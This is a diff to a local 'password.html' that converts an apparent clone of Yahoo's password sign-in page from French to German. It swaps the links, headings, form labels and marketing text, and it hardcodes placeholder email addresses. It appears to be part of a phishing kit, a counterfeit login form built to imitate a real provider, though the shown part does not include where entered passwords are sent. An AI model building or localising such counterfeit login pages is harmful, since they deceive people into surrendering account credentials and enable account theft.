--- a/password.html
+++ b/password.html
@@ -42,7 +42,7 @@
     <div id="login-body" class="loginish puree-v2">
         <div class="mbr-desktop-hd">
             <span class="column">
-                <a href="https://fr.yahoo.com/">
+                <a href="https://de.yahoo.com/">
                     <img src="assets/img/yahoo.png" alt="Yahoo"
                         class="logo " width="" height="36">
                     <img src="assets/img/yahoo-dark.png" alt="Yahoo"
@@ -50,52 +50,41 @@
                 </a>
             </span>
             <span class="column help txt-align-right">
-                <a href="https://help.yahoo.com/kb/index?locale=fr_FR&amp;page=product&amp;y=PROD_ACCT">Aide</a>
+                <a href="https://help.yahoo.com/kb/index?locale=fr_FR&amp;page=product&amp;y=PROD_ACCT">Hilfe</a>
             </span>
         </div>
         <div class="login-box-container">
             <div class="login-box right">
                 <div class="mbr-login-hd txt-align-center">
-                    <img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo"
-                        class="logo yahoo-fr-FR" width="" height="27">
-                    <img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo"
-                        class="dark-mode-logo logo yahoo-fr-FR" width="" height="27">
+                        <img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo yahoo-de-DE" width="" height="27">
+                        <img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_w_bestfit_frontpage_2x.png" alt="Yahoo" class="dark-mode-logo logo yahoo-de-DE" width="" height="27">
                 </div>
-                <div class="challenge email-verify-challenge">
-                    <div class="challenge-header">
-                        <div class="yid greet">Bonjour !</div>
-                    </div>
-                    <div id="email-verify-challenge" class="email-verify-challenge-primary">
-                        <div class="challenge-heading">Entrez votre mot de passe</div>
-                        <div class="challenge-sub-desc txt-align-center" id="email">dasdadsad@gmail.com</div>
-                        <form id="login-password-form" autocomplete="off" class="pure-form verification-form challenge-form">
-                            <div class="input-group">
-                                <input id="login-password" autocomplete="new-password" type="password" placeholder=" ">
-                                <label for="login-password">Mot de passe</label>
-                            </div>
-
-
-                            <div class="button-container">
-                                <button type="submit" name="verifyCode" id="verify-code-button"
-                                    class="pure-button puree-button-primary puree-spinner-button challenge-button"
-                                    value="true">
-                                    Continuer
-                                </button>
-                            </div>
-
-                            <div class="bottom-cta bottom-sticky sticky-shadow">
-                                <input type="submit" name="skip"
-                                    class="pure-button puree-button-link challenge-button-link"
-                                    value="Essayez une autre méthode pour vous&nbsp;connecter">
-                            </div>
-                        </form>
-                    </div>
-                </div>
+                <div class="challenge password-challenge">
+        <div class="challenge-header">
+            <div id="email" class="yid">sada@yahoo.com</div>
+        </div><div id="password-challenge" class="primary">
+        <strong class="challenge-heading">Passwort&nbsp;eingeben</strong>
+        <span class="txt-align-center challenge-desc">um die Anmeldung durchzuführen</span>
+            <form id="login-password-form" class="challenge-form">
+            <div id="password-container" class="input-group password-container blurred">
+                <input type="password" id="login-password" class="password" name="password" placeholder=" " autofocus="" autocomplete="current-password" data-rapid-tracking="true" data-ylk="elm:input;elmt:focus;slk:passwd;mKey:focus-passwd">
+                <label for="login-password" id="password-label" class="password-label">Passwort</label>
+            </div>
+            <div class="button-container">
+                <button type="submit" id="login-signin" class="pure-button puree-button-primary puree-spinner-button challenge-button" name="verifyPassword" value="Weiter" data-rapid-tracking="true" data-ylk="elm:btn;elmt:primary;slk:next;mKey:next">
+                        Weiter
+                </button>
+            </div>
+            <div class="forgot-cont challenge-button-link">
+                <input type="submit" class="pure-button puree-button-link challenge-button-link" data-ylk="elm:btn;elmt:skip;slk:skip;mKey:skip-recovery" data-rapid-tracking="true" id="mbr-forgot-link" name="skip" value="Passwort&nbsp;vergessen?">
+            </div>
+        </form>
+    </div>
+    </div>
             </div>
             <div id="login-box-ad-fallback" class="login-box-ad-fallback" style="display: block;">
-                <h1>Grâce à Yahoo, tous les sujets qui vous intéressent sont à portée de&nbsp;main.</h1>
-                <p>Yahoo&nbsp;Mail, actualités locales, nationales et internationales, finances, sports, musique,
-                    cinéma... Vivez la vie à fond en profitant pleinement du&nbsp;Web.</p>
+                <h1>Mit Yahoo ist es ganz einfach, die wichtigen Dinge zu genießen.</h1>
+                <p>Das erstklassige Yahoo Mail, für die neuesten lokalen, nationalen und internationalen Nachrichten, Finanzen, Sport, Musik, Kino und mehr. Mehr vom Internet, mehr vom&nbsp;Leben.</p>
             </div>
         </div>
 
